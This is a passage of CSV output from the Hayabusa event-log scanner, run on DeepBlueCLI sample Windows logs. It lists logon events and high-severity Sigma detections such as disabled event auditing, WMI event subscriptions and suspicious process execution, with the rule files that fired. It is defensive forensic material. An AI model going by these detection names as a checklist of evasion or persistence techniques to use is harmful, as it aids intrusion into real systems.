.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : 
LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 
+09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 00:28:28.043 
+09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:31:31.000 
+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:31:43.146 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
-2016-08-19 01:33:09.568 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:34:07.677 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:35:01.052 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:36:08.912 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:40:11.872 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:41:14.715 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:42:51.887 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:23.564 +09:00,IE10Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other 
File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
